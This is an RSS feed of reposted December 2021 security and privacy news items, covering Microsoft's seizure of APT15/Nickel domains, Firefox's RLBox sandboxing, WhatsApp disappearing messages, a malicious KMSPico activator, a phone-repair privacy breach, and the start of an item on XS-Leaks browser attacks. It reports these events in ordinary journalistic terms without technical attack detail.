<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/140/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>Microsoft Seizes 42 Malicious Web Domains Used By Chinese Hackers</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-seizes-42-malicious-web-domains-used-by-chinese-hackers-r3579/</link><description><![CDATA[<p>
	Microsoft on Monday announced the seizure of 42 domains used by a China-based cyber espionage group that set its sights on organizations in the U.S. and 28 other countries pursuant to a legal warrant issued by a federal court in the U.S. state of Virginia.
</p>

<p>
	 
</p>

<p>
	The Redmond company attributed the malicious activities to a group it tracks as Nickel, which is also known across the wider cybersecurity industry under the monikers APT15, Bronze Palace, Ke3Chang, Mirage, Playful Dragon, and Vixen Panda. The advanced persistent threat (APT) actor is believed to have been active since at least 2012.
</p>

<p>
	 
</p>

<p>
	"Nickel has targeted organizations in both the private and public sectors, including diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe and Africa," Microsoft's Corporate Vice President for Customer Security and Trust, Tom Burt, said. "There is often a correlation between Nickel's targets and China's geopolitical interests."
</p>

<p>
	 
</p>

<p>
	The rogue infrastructure enabled the hacking crew to maintain long-term access to the compromised machines and execute attacks for intelligence gathering purposes targeting unnamed government agencies, think tanks, and human rights organizations as part of a digital espionage campaign dating back to September 2019.
</p>

<p>
	 
</p>

<p>
	Microsoft described the attacks as "highly sophisticated," saying they used a multitude of techniques, including breaching remote access services and exploiting vulnerabilities in unpatched VPN appliances as well as Exchange Server and SharePoint systems to "insert hard-to-detect malware that facilitates intrusion, surveillance and data theft."
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="AVvXsEgJwi8BOD-s_QqjMAzj1OUcSvsEdQ7QioAM" class="ipsImage" data-ratio="69.31" height="494" width="720" src="https://thehackernews.com/new-images/img/a/AVvXsEgJwi8BOD-s_QqjMAzj1OUcSvsEdQ7QioAMg2qkbeVJnThPMm-eH3sDShQiWgp4DdH6OdW56AS76Xl5foEWfsA2Z-VzO9UdIxDa1kesoPbi_L6EjaRZPDKbKhDUcwJNxxsTkSCgR6mXBCP7WsC680nF7a-MPNbkwUtHGweuAyQMTcFQ1I6VkWdSBFHu=s728-e1000" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	Upon gaining an initial foothold, Nickel has been found deploying credential dumping tools and stealers such as Mimikatz and WDigest to hack into victim accounts, followed by delivering custom malware that allowed the actor to maintain persistence on victim networks over extended periods of time and conduct regularly scheduled exfiltration of files, execute arbitrary shellcode, and collect emails from Microsoft 365 accounts using compromised credentials.
</p>

<p>
	 
</p>

<p>
	The multiple backdoor families used for command and control are being tracked as Neoichor, Leeson, NumbIdea, NullItch, and Rokum.
</p>

<p>
	 
</p>

<p>
	The latest wave of attacks adds to an extensive list of surveillanceware campaigns mounted by the APT15 group in recent years. In July 2020, mobile security firm Lookout disclosed four trojanized legitimate apps — named SilkBean, DoubleAgent, CarbonSteal, and GoldenEagle — that targeted the Uyghur ethnic minority and the Tibetan community with the goal of gathering and transmitting personal user data to adversary-operated command-and-control servers.
</p>

<p>
	 
</p>

<p>
	"As China's influence around the world continues to grow and the nation establishes bilateral relations with more countries and extends partnerships in support of China's Belt and Road Initiative, we assess that China-based threat actors will continue to target customers in government, diplomatic, and NGO sectors to gain new insights, likely in pursuit of economic espionage or traditional intelligence collection objectives," Microsoft said.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/12/microsoft-seizes-42-malicious-web.html" rel="external nofollow">Source</a></strong>
</p>

<p>
	 
</p>

<p>
	<em>Also: <a href="https://www.pcmag.com/news/microsoft-seizes-42-domains-used-by-chinese-hacking-group-nickel" rel="external nofollow">Microsoft Seizes 42 Domains Used by Chinese Hacking Group Nickel.</a></em>
</p>
]]></description><guid isPermaLink="false">3579</guid><pubDate>Tue, 07 Dec 2021 14:00:13 +0000</pubDate></item><item><title>Computer scientists develop a framework to protect browsers from zero-day vulnerabilities in third-party libraries</title><link>https://nsaneforums.com/news/security-privacy-news/computer-scientists-develop-a-framework-to-protect-browsers-from-zero-day-vulnerabilities-in-third-party-libraries-r3578/</link><description><![CDATA[<p>
	Researchers from the University of California San Diego, the University of Texas at Austin, and Mozilla have designed a new framework, called RLBox, to make the Firefox browser more secure. Mozilla has started deploying RLBox on all Firefox platforms this week.
</p>

<p>
	 
</p>

<p>
	RLBox increases browser security by separating third-party libraries that are vulnerable to attacks from the rest of the browser to contain potential damage—a practice called sandboxing.
</p>

<p>
	 
</p>

<p>
	Browsers like Firefox rely on third-party libraries to support different functionalities—from XML parsing, to spell checking and font rendering. These libraries are often written in low-level programming languages, like C, and, unfortunately, introducing vulnerabilities in C code is extremely easy.
</p>

<p>
	 
</p>

<p>
	RLBox protects users from inevitable vulnerabilities in these libraries and supply-chain attacks that exploit these libraries.
</p>

<p>
	 
</p>

<p>
	"Well-funded attackers are exploiting zero-day vulnerabilities and supply chains to target real users," said Deian Stefan, an assistant professor in UC San Diego's Computer Science and Engineering department. "To deal with such sophisticated attackers we need multiple layers of defense and new techniques to minimize how much code we need to trust (to be secure). We designed RLBox exactly for this."
</p>

<p>
	 
</p>

<p>
	The team's effort to deploy RLBox on all Firefox platforms is detailed in a recent Mozilla Hacks blog post.
</p>

<p>
	 
</p>

<p>
	With RLBox, developers can retrofit systems like Firefox to put modules, like third-party libraries, in a fine-grained software sandbox. Like process-based sandboxing, which browsers use to isolate one site from another, software sandboxing ensures that bugs in the sandboxed module will not create security vulnerabilities—bugs are contained to the sandbox. "Unlike process-based sandboxing, though, RLBox's sandboxing technique makes it possible for developers to isolate tightly coupled modules like Graphite and Expat without huge engineering or performance costs," said Shravan Narayan, the UC San Diego computer science Ph.D. student leading the project.
</p>

<p>
	 
</p>

<p>
	<strong>WebAssembly and sandboxing</strong>
</p>

<p>
	 
</p>

<p>
	At its core, the RLBox framework consists of two components. The first is the sandboxing technique itself: RLBox uses WebAssembly (Wasm). Specifically, RLBox compiles modules to WebAssembly and then compiles Wasm to native code using the fast and portable wasm2c compiler. "By compiling to Wasm before native code, we get sandboxing for free: We can ensure that all memory access and control flow will be instrumented to be confined to the module boundary," said Narayan.
</p>

<p>
	 
</p>

<p>
	Wasm also makes it possible for RLBox to optimize calls into and out of sandboxed code into simple function calls. In an upcoming study, to be published in the proceedings of the 2022 ACM SIGPLAN Principles of Programming Languages Symposium, the researchers show that this is safe because Wasm satisfies a set of theoretical conditions called "zero-cost conditions." This is unlike most other sandboxing techniques, which require glue code at the sandbox-application boundary to be secure. This glue code is error-prone and, in some cases, contributes to large performance overheads—the team's Wasm compiler elides this glue code, its complexity, and its overhead.
</p>

<p>
	 
</p>

<p>
	<strong>Tainted type system</strong>
</p>

<p>
	 
</p>

<p>
	The second key component of RLBox is its tainted type system. Sophisticated attackers can break out of the Wasm sandbox if the code interfacing with the sandboxed code—the Firefox code—does not carefully validate all the data that comes out of the sandbox. RLBox's type system, which is implemented using C++ metaprogramming, prevents such attacks by marking all data coming out of the sandbox as "tainted" and ensuring, through compiler errors, that developers sanitize potentially unsafe data before using it. "Without such a type system, it would be extremely difficult to ensure that developers put all the right checks in all the right places," said Stefan.
</p>

<p>
	 
</p>

<p>
	"RLBox is a big win for Firefox and our users," said Bobby Holley, Distinguished Engineer at Mozilla. "It protects our users from accidental defects as well as supply-chain attacks, and it reduces the need for us to scramble when such issues are disclosed upstream."
</p>

<p>
	 
</p>

<p>
	The team's original work on RLBox was published in the proceedings of the USENIX Security Symposium last March. Since then they've been working on bringing RLBox to all Firefox users. RLBox will ship on all Firefox platforms, desktop and mobile, sandboxing five different modules: Graphite, Hunspell, Ogg, Expat and Woff2. The team is actively working on sandboxing more modules in future versions of Firefox and supporting use cases beyond Firefox.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://techxplore.com/news/2021-12-scientists-framework-browsers-zero-day-vulnerabilities.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">3578</guid><pubDate>Tue, 07 Dec 2021 13:54:06 +0000</pubDate></item><item><title>WhatsApp adds default disappearing messages for new chats</title><link>https://nsaneforums.com/news/security-privacy-news/whatsapp-adds-default-disappearing-messages-for-new-chats-r3576/</link><description><![CDATA[<p>
	WhatsApp announced today that it had expanded the privacy control features with the addition of default disappearing messages for all newly initiated chats.
</p>

<p>
	 
</p>

<p>
	"When enabled, all new one-on-one chats you or another person start will be set to disappear at your chosen duration, and we've added a new option when creating a group chat that lets you turn it on for groups you create," WhatsApp <a href="https://about.fb.com/news/2021/12/whatsapp-default-disappearing-messages-multiple-durations/" rel="external nofollow" target="_blank">said</a>. "This new feature is optional and does not change or delete any of your existing chats."
</p>

<p>
	 
</p>

<p>
	Today, with the launch of default disappearing messages, the company also added two new durations that allow setting up messages to disappear after 24 hours or 90 days.
</p>

<p>
	 
</p>

<p>
	You can enable disappearing messages by default for all new one-to-one chats on iOS and Android devices by going to WhatsApp Settings, tapping Account &gt; Privacy &gt; Default message timer, and selecting a duration.
</p>

<p>
	 
</p>

<p>
	However, if you want to permanently have access to one of your chats in the future, you also have the choice to switch back to standard chats where disappearing messages are not enabled.
</p>

<p>
	 
</p>

<p>
	"For people who choose to switch on default disappearing messages, we will display a message in your chats that tells people this is the default you've chosen," the company added.
</p>

<p>
	 
</p>

<p>
	"This makes clear it's nothing personal – it's a choice you've made about how you want to communicate with everyone on WhatsApp moving forward."
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="WhatsApp_disappearing_messages.jpg" class="ipsImage" data-ratio="75.10" height="417" width="720" src="https://www.bleepstatic.com/images/news/u/1109292/2021/WhatsApp_disappearing_messages.jpg">
		</p>

		<figcaption>
			WhatsApp default disappearing messages (WhatsApp)
		</figcaption>
	</figure>
</div>

<p>
	The company, however, warned that enabling disappearing messages won't stop untrusted individuals from forwarding them to others, as messages can still be saved (screenshotted or copied) before they're removed from the chat.
</p>

<p>
	 
</p>

<p>
	This comes after the <a href="https://blog.whatsapp.com/introducing-disappearing-messages-on-whatsapp/?lang=en" rel="external nofollow" target="_blank">introduction of disappearing messages</a> one year ago, in November 2020, with all new messages sent to a chat set to disappear after seven days if the feature was enabled by one of the recipients in one-to-one conversations or by an admin in group chats.
</p>

<p>
	 
</p>

<p>
	In August, Facebook also added the option to set <a href="http://blog.whatsapp.com/view-once-photos-and-videos-on-whatsapp" rel="external nofollow" target="_blank">photos and videos to immediately disappear</a> after being viewed once for additional control over one's privacy.
</p>

<p>
	 
</p>

<p>
	Last but not least, in October, WhatsApp also rolled out <a href="https://www.bleepingcomputer.com/news/security/whatsapp-rolls-out-ios-android-end-to-end-encrypted-chat-backups/" target="_blank" rel="external nofollow">end-to-end encrypted chat backups on iOS and Android</a> to block anyone from accessing chats, regardless of where they are stored.
</p>

<p>
	 
</p>

<p>
	These changes came after <a href="https://www.bleepingcomputer.com/news/technology/whatsapp-caves-in-wont-limit-features-if-you-reject-privacy-changes/" target="_blank" rel="external nofollow">WhatsApp backtracked</a> on earlier decisions <a href="https://www.bleepingcomputer.com/news/technology/whatsapp-to-restrict-features-if-you-refuse-facebook-data-sharing/" target="_blank" rel="external nofollow">to restrict features</a> or <a href="https://www.bleepingcomputer.com/news/security/whatsapp-share-your-data-with-facebook-or-delete-your-account/" target="_blank" rel="external nofollow">delete the accounts</a> of users who disagreed with a new privacy policy requiring them to share their data with other Facebook companies.
</p>

<p>
	 
</p>

<p>
	"We believe disappearing messages along with end-to-end encryption are two crucial features that define what it means to be a private messaging service today, and bring us one step closer to the feeling of an in-person conversation," WhatsApp concluded today.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/whatsapp-adds-default-disappearing-messages-for-new-chats/" rel="external nofollow">WhatsApp adds default disappearing messages for new chats</a>
</p>
]]></description><guid isPermaLink="false">3576</guid><pubDate>Mon, 06 Dec 2021 22:42:13 +0000</pubDate></item><item><title>Firefox 95 will include RLBox sandboxing for added security</title><link>https://nsaneforums.com/news/security-privacy-news/firefox-95-will-include-rlbox-sandboxing-for-added-security-r3574/</link><description><![CDATA[<p>
	Mozilla <a href="https://hacks.mozilla.org/2021/12/webassembly-and-back-again-fine-grained-sandboxing-in-firefox-95/" rel="external nofollow">has announced</a> through its Mozilla Hacks blog that it plans to ship a ‘novel sandboxing technology’ called RLBox with Firefox 95 which it has been developing alongside researchers from the University of California San Diego and the University of Texas. It said RLBox makes it easier to isolate subcomponents of the browser efficiently and gives Mozilla more options than traditional sandboxing granted it.
</p>

<p>
	 
</p>

<p>
	Mozilla said this new method of sandboxing, which uses WebAssembly to isolate potentially-buggy code, builds on a prototype that was shipped in Firefox 74 and Firefox 75 to Linux and Mac users respectively. With Firefox 95, RLBox will be deployed on all supported Firefox platforms including desktop and mobile to isolate three different modules: Graphite, Hunspell, and Ogg. With Firefox 96, two more modules, Expat and Woff2, will also be isolated.
</p>

<p>
	 
</p>

<p>
	Commenting on the next steps for RLBox, Mozilla engineer Bobby Holley said:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	“RLBox is a big win for us on several fronts: it protects our users from accidental defects as well as supply-chain attacks, and it reduces the need for us to scramble when such issues are disclosed upstream. As such, we intend to continue applying it to more components going forward. Some components are not a good fit for this approach — either because they depend too much on sharing memory with the rest of the program, or because they’re too performance-sensitive to accept the modest overhead incurred — but we’ve identified a number of other good candidates.”
</p>

<p>
	 
</p>

<p>
	It should also be noted that the company has updated its <a href="https://www.mozilla.org/en-US/security/client-bug-bounty/#exploit-mitigation-bounty" rel="external nofollow">bug bounty program</a> so that researchers are paid for bypassing the sandbox even if there are no vulnerabilities in the isolated library; this will help tighten up the browser’s security further. If you’d like to learn more of the technical aspects behind RLBox, be sure to check out the <a href="https://hacks.mozilla.org/2021/12/webassembly-and-back-again-fine-grained-sandboxing-in-firefox-95/" rel="external nofollow">Mozilla Hacks post</a>.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/firefox-95-will-include-rlbox-sandboxing-for-added-security/" rel="external nofollow">Firefox 95 will include RLBox sandboxing for added security</a>
</p>
]]></description><guid isPermaLink="false">3574</guid><pubDate>Mon, 06 Dec 2021 22:37:46 +0000</pubDate></item><item><title>Firefox Monitor may remove personal information now from the Internet</title><link>https://nsaneforums.com/news/security-privacy-news/firefox-monitor-may-remove-personal-information-now-from-the-internet-r3573/</link><description><![CDATA[<p>
	<a data-wpel-link="external" href="https://monitor.firefox.com/" rel="external nofollow" target="_blank">Firefox Monitor</a>, Mozilla's password breach checking service, may soon be used to remove personal information from the Internet. Interested users of Firefox Monitor may join a waitlist to start using the service.
</p>

<p>
	 
</p>

<p>
	<img alt="firefox-monitor-personal-information.web" class="ipsImage" data-ratio="75.10" height="456" width="720" src="https://www.ghacks.net/wp-content/uploads/2021/12/firefox-monitor-personal-information.webp">
</p>

<p>
	 
</p>

<p>
	For this, it is necessary to sign in to a Firefox Monitor account, or create a new one, and click on the join waitlist button of the new <a data-wpel-link="external" href="https://monitor.firefox.com/remove-my-data" rel="external nofollow" target="_blank">data removal feature</a> of the service.
</p>

<p>
	 
</p>

<p>
	Little is known about the functionality of the service at this point. Two questions are answered by Mozilla.
</p>

<blockquote>
	<p>
		Why remove your personal information?
	</p>

	<p>
		When your personal information is online, you might be an easier target for identity theft, fraud, or even cyberstalking. Advertisers, companies, and hackers can quickly figure out a lot of information about you, like your name, home address, family information, or even social security numbers and passwords.
	</p>

	<p>
		How do we remove it?
	</p>

	<p>
		We are creating a privacy service to monitor websites for your personal information and remove it from sites that put you and your loved ones at risk. It’s not available yet, but click below if you are interested in finding out more.
	</p>
</blockquote>

<p>
	Many questions are left unanswered right now, including:
</p>

<p>
	 
</p>

<ul>
	<li>
		<strong>The definition of personal information.</strong> What does it include? Are we speaking about textual information only, e.g. name, address and social security numbers, or also media, e.g. leaked photos?
	</li>
	<li>
		<strong>The scope of the service.</strong> Is Mozilla monitoring the entire Internet for leaks, or is the data removal service limited to certain major sites, such as Facebook or Twitter, at least initially?
	</li>
	<li>
		<strong>How are removals handled?</strong> Is this an automated process, or, more likely in my opinion, do users need to give Mozilla's service permission to request the removal of data for each source individually?
	</li>
</ul>

<p>
	 
</p>

<p>
	<strong>Closing Words</strong>
</p>

<p>
	 
</p>

<p>
	Firefox Monitor's new data removal service adds more value to the service. It is a good addition to the service, if Mozilla gets it right. It seems improbable that the organization is monitoring the entire Internet for personal information of its users, and it is unclear whether Mozilla is creating the service from scratch or partnering with an established data removal service instead. Will the new personal information feature be free of charge? Mozilla is running several paid services already, e.g. Mozilla VPN or Pocket, and it is possible that the data removal service won't be free of charge, or will be limited.
</p>

<p>
	 
</p>

<p>
	All in all, it could give Firefox Monitor a boost, especially when compared to the other password leak solutions that are available on the Internet.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2021/12/06/firefox-monitor-may-remove-personal-information-now-from-the-internet/" rel="external nofollow">Firefox Monitor may remove personal information now from the Internet</a>
</p>
]]></description><guid isPermaLink="false">3573</guid><pubDate>Mon, 06 Dec 2021 22:36:01 +0000</pubDate></item><item><title>Microsoft seizes sites used by APT15 Chinese state hackers</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-seizes-sites-used-by-apt15-chinese-state-hackers-r3572/</link><description><![CDATA[<p>
	Microsoft seized today dozens of malicious sites used by the Nickel China-based hacking group to target organizations in the US and 28 other countries worldwide.
</p>

<p>
	 
</p>

<p>
	In their attacks, the Nickel threat actor (also tracked as KE3CHANG, APT15, Vixen Panda, Royal APT, and Playful Dragon) compromised the servers of government organizations, diplomatic entities, and non-governmental organizations (NGOs) across 29 countries, mainly from Europe and Latin America.
</p>

<p>
	 
</p>

<p>
	"Nickel has targeted organizations in both the private and public sectors, including diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe and Africa," <a href="https://blogs.microsoft.com/on-the-issues/2021/12/06/cyberattacks-nickel-dcu-china/" rel="external nofollow" target="_blank">said </a>Tom Burt, Corporate Vice President for Customer Security &amp; Trust at Microsoft.
</p>

<p>
	 
</p>

<p>
	"We believe these attacks were largely being used for intelligence gathering from government agencies, think tanks, and human rights organizations."
</p>

<p>
	 
</p>

<p>
	Microsoft was able to take down Nickel's infrastructure after the US District Court for the Eastern District of Virginia granted an order <a href="https://www.documentcloud.org/documents/21138967-nickel_bc_complaint" rel="external nofollow" target="_blank">following a complaint filed on December 2</a> (the list of seized domains is available <a href="https://www.documentcloud.org/documents/21138968-nickel_bc_appendix_a_domains" rel="external nofollow" target="_blank">here</a>).
</p>

<p>
	 
</p>

<p>
	According to <a href="https://www.documentcloud.org/documents/21138969-nickel_bc_order-granting-tro#document/p8/a2068724" rel="external nofollow" target="_blank">the court's order</a> (which also contains the list of seized sites), the domains were redirected "to secure servers by changing the authoritative name servers to NS104a.microsoftintemetsafety.net and NS104b.microsoftintemetsafety.net."
</p>

<p>
	 
</p>

<p>
	Microsoft's Digital Crimes Unit (DCU) first spotted the threat group behind these malicious domains in 2016. Mandiant <a href="https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs" rel="external nofollow" target="_blank">tracks them as Ke3chang</a> and says they've been active since at least 2010.
</p>

<p>
	 
</p>

<p>
	Since 2019, Microsoft's Threat Intelligence Center (MSTIC) and Digital Security Unit (DSU) have observed the group <a href="https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/" rel="external nofollow" target="_blank">targeting government entities across Latin America and Europe</a>.
</p>

<p>
	 
</p>

<p>
	Nickel's end goal is to deploy malware on compromised servers which enables its operators to monitor their victims' activity, as well as collect data and exfiltrate it to servers under their control.
</p>

<p>
	 
</p>

<p>
	These Chinese-backed hackers use compromised third-party VPN (virtual private network) suppliers, credentials stolen in spear-phishing campaigns, and exploits targeting unpatched on-premises Exchange Server and SharePoint servers to hack into their targets' networks.
</p>

<p>
	 
</p>

<p>
	More info on the hacking group's malicious activity and indicators of compromise including domains used in their attacks can be found <a href="https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe/" rel="external nofollow" target="_blank">here</a>.
</p>

<div>
	<figure>
		<p>
			 
		</p>

		<p>
			<img alt="Nickel_targets.jpg" class="ipsImage" data-ratio="75.10" height="540" width="582" src="https://www.bleepstatic.com/images/news/u/1109292/2021/Nickel_targets.jpg">
		</p>

		<figcaption>
			Nickel targets (Microsoft)
		</figcaption>
	</figure>
</div>

<p>
	"To date, in 24 lawsuits – five against nation-state actors – we’ve taken down more than 10,000 malicious websites used by cybercriminals and nearly 600 sites used by nation-state actors," Burt added.
</p>

<p>
	 
</p>

<p>
	"We have also successfully blocked the registration of 600,000 sites to get ahead of criminal actors that planned to use them maliciously in the future."
</p>

<p>
	 
</p>

<p>
	In March 2020, the company <a href="https://www.bleepingcomputer.com/news/security/microsoft-takes-control-of-necurs-us-based-infrastructure/" target="_blank" rel="external nofollow">took control of the U.S.-based infrastructure the Necurs spam botnet</a> used to distribute malware payloads and infect millions of computers.
</p>

<p>
	 
</p>

<p>
	According to Microsoft, before being taken down, Necurs sent roughly 3.8 million spam messages to more than 40.6 million targets over just 58 days.
</p>

<p>
	 
</p>

<p>
	Redmond also <a href="https://www.bleepingcomputer.com/news/security/microsoft-takes-north-korean-hacking-group-thallium-to-court/" target="_blank" rel="external nofollow">sued the North Korean-linked Thallium cyber-espionage group</a> in December 2019 and seized 50 domains that were part of the hacking group's malicious domain infrastructure.
</p>

<p>
	 
</p>

<p>
	Microsoft’s Digital Crimes Unit also <a href="https://www.bleepingcomputer.com/news/security/microsoft-retaliates-against-apt35-hacker-group-by-seizing-99-domains/" target="_blank" rel="external nofollow">disrupted the Iran-backed APT35 (aka Charming Kitten, Phosphorus, or Ajax Security Team) threat actor</a> in December 2019 after taking over servers used in its cyber attacks.
</p>

<p>
	 
</p>

<p>
	Previously, Microsoft <a href="https://blogs.microsoft.com/on-the-issues/2018/08/20/we-are-taking-new-steps-against-broadening-threats-to-democracy/" rel="external nofollow" target="_blank">filed 15 similar cases</a> against the Russian-backed group Strontium (aka Fancy Bear or APT28) in August 2018, which led to the seizure of 91 malicious domains.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-seizes-sites-used-by-apt15-chinese-state-hackers/" rel="external nofollow">Microsoft seizes sites used by APT15 Chinese state hackers</a>
</p>
]]></description><guid isPermaLink="false">3572</guid><pubDate>Mon, 06 Dec 2021 22:32:53 +0000</pubDate></item><item><title>Malicious KMSPico Windows Activator Stealing Users' Cryptocurrency Wallets</title><link>https://nsaneforums.com/news/security-privacy-news/malicious-kmspico-windows-activator-stealing-users-cryptocurrency-wallets-r3567/</link><description><![CDATA[<p>
	Users looking to activate Windows without using a digital license or a product key are being targeted by tainted installers to deploy malware designed to plunder credentials and other information in cryptocurrency wallets.
</p>

<p>
	 
</p>

<p>
	The malware, dubbed "CryptBot," is an information stealer capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies, credit cards, and capturing screenshots from the infected systems. Deployed via cracked software, the latest attack involves the malware masquerading as KMSPico.
</p>

<p>
	 
</p>

<p>
	KMSPico is an unofficial tool that's used to illicitly activate the full features of pirated copies of software such as Microsoft Windows and Office products without actually owning a license key.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="AVvXsEgCZp4WBbNG7worLyLO41CP2w7Yhz7MHgLt" class="ipsImage" data-ratio="64.58" height="460" width="720" src="https://thehackernews.com/new-images/img/a/AVvXsEgCZp4WBbNG7worLyLO41CP2w7Yhz7MHgLtZ2dKxVjtbOlsLq9cK5nPO4fm1L_Fj-aJTfrCqW7whKPYmYKVFwqek0X55-tHojLoEVpgBzCcXsrT2aOzsLu-IvulOjAt9GjuutJ4RQ0UnaPN7jj1_XvvzZH67Qc0ga3mfFH9KpLbZFoHrIRNE-NjSOMi" />
</p>

<p>
	"The user becomes infected by clicking one of the malicious links and downloading either KMSPico, Cryptbot, or another malware without KMSPico," Red Canary researcher Tony Lambert said in a report published last week. "The adversaries install KMSPico also, because that is what the victim expects to happen, while simultaneously deploying Cryptbot behind the scenes."
</p>

<p>
	 
</p>

<p>
	The American cybersecurity firm said it also observed several IT departments using illegitimate software instead of legitimate Microsoft licenses to activate systems, adding that the altered KMSPico installers are distributed via a number of websites that claim to be offering the "official" version of the activator.
</p>

<p>
	 
</p>

<p>
	This is far from the first time cracked software has emerged as a conduit for deploying malware. In June 2021, Czech cybersecurity software company Avast disclosed a campaign dubbed "Crackonosh" that involved distributing illegal copies of popular software to illegally abuse the compromised machines to mine cryptocurrency, netting the attacker over $2 million in profits.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2021/12/malicious-kmspico-windows-activator.html" rel="external nofollow">Source</a></strong>
</p>

<p>
	 
</p>

<p>
	<em>Also: <a href="https://www.neowin.net/news/beware-fake-kmspico-windows-activator-carries-crypto-wallet-info-stealing-malware/" rel="external nofollow">Beware: Fake KMSPico Windows activator carries crypto wallet info stealing malware.</a></em>
</p>
]]></description><guid isPermaLink="false">3567</guid><pubDate>Mon, 06 Dec 2021 13:53:57 +0000</pubDate></item><item><title>Woman&#x2019;s email and photos compromised by hacker looking for nudes after she sent phone to Google for repair</title><link>https://nsaneforums.com/news/security-privacy-news/woman%E2%80%99s-email-and-photos-compromised-by-hacker-looking-for-nudes-after-she-sent-phone-to-google-for-repair-r3566/</link><description><![CDATA[<p>
	Google’s staff allegedly accessed the Google services, Dropbox account, and email account of a customer’s Pixel 5a device after it was sent in for repair.
</p>

<p>
	 
</p>

<p>
	Jane McGonigal, an author and developer, wrote a Twitter thread alleging that members of Google’s team “opened a bunch of selfies hoping to find nudes” judging by activity logs Ms McGonigal had access to.
</p>

<p>
	 
</p>

<p>
	“The photos they opened were of me in bathing suits, sports bras, form-fitting dresses, and of stitches after surgery. They deleted Google security notifications in my backup email accounts”, Ms McGonigal wrote.
</p>

<p>
	 
</p>

<div class="ipsEmbeddedOther">
	<iframe allowfullscreen="" data-controller="core.front.core.autosizeiframe" data-embedid="embed2858106618" scrolling="no" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://twitter.com/avantgame/status/1467192779973398531?ref_src=twsrc%255Etfw%257Ctwcamp%255Etweetembed%257Ctwterm%255E1467192779973398531%257Ctwgr%255E%257Ctwcon%255Es1_%26ref_url=https://www.independent.co.uk/life-style/gadgets-and-tech/email-photo-hacker-nudes-google-phone-repair-b1970480.html" style="height:343px;"></iframe>
</div>

<p>
	 
</p>

<p>
	“This happened even though I tried to erase the phone and lock the phone from Google’s find my phone service.”
</p>

<p>
	 
</p>

<p>
	Ms McGonigal went on to say that the “hacker” changed her Gmail settings to mark all security messages as spam, leading to her not being aware of the issue until she checked the folder. The hacker also reportedly changed her passwords.
</p>

<p>
	 
</p>

<p>
	Google did not respond to a request for comment from The Independent before time of publication, but Ms McGonigal has apparently “heard from individuals via backchannel, not officially from Google, that Google is looking into it and it’s getting escalated.” She added that she has “not been officially contacted by anyone with information or offer to help yet”.
</p>

<p>
	 
</p>

<p>
	This is apparently not the first issue Ms McGonigal has had with the Pixel repair team. “I have been on Google support and Pixel support dozens of times all week BEFORE the hack happened, asking them to investigate why my phone marked delivered by FedEx ‘disappeared’ at the warehouse”, she tweeted.
</p>

<p>
	 
</p>

<p>
	It is possible that Google never received the device that Ms McGonigal sent to them, and instead the device was intercepted in transit, she suggested.
</p>

<p>
	 
</p>

<p>
	FedEx did not respond to a request for comment from The Independent before time of publication.
</p>

<p>
	 
</p>

<p>
	In most instances it is good practice to completely wipe a device before sending it to be repaired – whether that is by the official manufacturer or a trusted third-party provider. Sometimes, however, this is not possible.
</p>

<p>
	 
</p>

<p>
	“A consumer can’t factory reset a phone that won’t turn on. I took every other recommended step to secure it including Lock my Phone and Erase my Phone via Google’s FindMyPhone service. It did not work”, Ms McGonigal tweeted.
</p>

<p>
	 
</p>

<p>
	<a href="https://news.yahoo.com/woman-email-photos-compromised-hacker-105629951.html" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">3566</guid><pubDate>Mon, 06 Dec 2021 13:50:16 +0000</pubDate></item><item><title>14 New XS-Leaks (Cross-Site Leaks) Attacks Affect All Modern Web Browsers</title><link>https://nsaneforums.com/news/security-privacy-news/14-new-xs-leaks-cross-site-leaks-attacks-affect-all-modern-web-browsers-r3565/</link><description><![CDATA[<p>
	Researchers have discovered 14 new types of cross-site data leakage attacks against a number of modern web browsers, including Tor Browser, Mozilla Firefox, Google Chrome, Microsoft Edge, Apple Safari, and Opera, among others.
</p>

<p>
	 
</p>

<p>
	Collectively known as "XS-Leaks," the browser bugs enable a malicious website to harvest personal data from its visitors as they interact with other websites in the background without the targets' knowledge. The findings are the result of a comprehensive study of cross-site attacks undertaken by a group of academics from Ruhr-Universität Bochum (RUB) and Niederrhein University.
</p>

<p>
	 
</p>

<p>
	"XS-Leaks bypass the so-called same-origin policy, one of a browser's main defences against various types of attacks," the researchers said in a statement. "The purpose of the same-origin policy is to prevent information from being stolen from a trusted website. In the case of XS-Leaks, attackers can nevertheless recognize individual, small details of a website. If these details are tied to personal data, those data can be leaked."
</p>

<p>
	 
</p>

<p>
	Stemming from side-channels built into the web platform that permit an attacker to gather this data from a cross-origin HTTP resource, the cross-site bugs impact an array of popular browsers such as Tor, Chrome, Edge, Opera, Safari, Firefox, and Samsung Internet, spanning different operating systems including Windows, macOS, Android, and iOS.
</p>

<p>
	 
</p>

<p>
